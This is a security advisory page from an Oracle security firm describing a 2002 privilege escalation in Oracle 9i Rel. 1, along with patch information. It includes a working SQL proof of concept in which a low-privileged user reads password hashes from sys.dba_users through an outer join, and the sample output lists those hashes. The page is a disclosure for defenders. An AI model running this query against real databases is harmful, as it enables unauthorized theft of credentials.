Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Escalate Privileges via View with Outer Joins in Oracle 9i Rel. 1

Name Escalate Privileges via View with Outer Joins in Oracle 9i Rel. 1 (9.1.0.1)
Systems Affected Oracle 9i Rel. 1
Severity High Risk
Category Privilege Escalation
Vendor URL http://www.oracle.com/
Exploit http://www.securiteam.com
Date 21 Apr 2002 (V 1.00)

Details

A potential security vulnerability has been discovered in Oracle9i database server. It is possible to create a user defined in the Oracle9i database server with limited privileges who can potentially access privileged data using SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server.



Example
SQL> connect / as sysdba
Connected.
SQL> CREATE USER rds IDENTIFIED BY rds;

User created.

SQL> Grant Create Session to rds;

Grant succeeded.

SQL> connect rds/rds;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;

USERNAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
SYSTEM D4DF7931AB130E37
DBSNMP E066D214D5421CCC
AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD
SCOTT F894844C34402B67
RDS B2ABF50FCECAE7CB
OUTLN 4A3BA55E08595C81
ORDSYS 7EFA02EC7EA6B86F
OLAPSVR AF52CFD036E8F425
OLAPSYS 3FB8EF9DB538647C
ORDPLUGINS 88A2B2C183431F00
MDSYS 72979A94BAD2AF80
CTXSYS 71E687F036AD56E5
WKSYS 69ED49EE1851900D
OLAPDBA 1AF71599EDACFB00
QS_CBADM 7C632AFB71F8D305
QS_ADM 991CDDAD5C5C32CA
QS 8B09C6075BDF2DC4
QS_WS 24ACF617DD7D8F2F
HR 6399F3B38EDF3288
OE 9C30855E7E0CB02D
PM 72E382A52E89575A
SH 9793B3777CD3BD1A
QS_ES E6A6FA4BB042E3C2
QS_OS FF09F3EB14AE5C26
RMAN E7B5D92911C831E1
QS_CB CF9CFACF5AE24964
QS_CS 91A00922D8C0F146

30 rows selected.

SQL>



Patch Information
Apply Oracle Patchset 9.1.0.2 or later



2006 by Red-Database-Security GmbH - last update 10-apr-2006

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.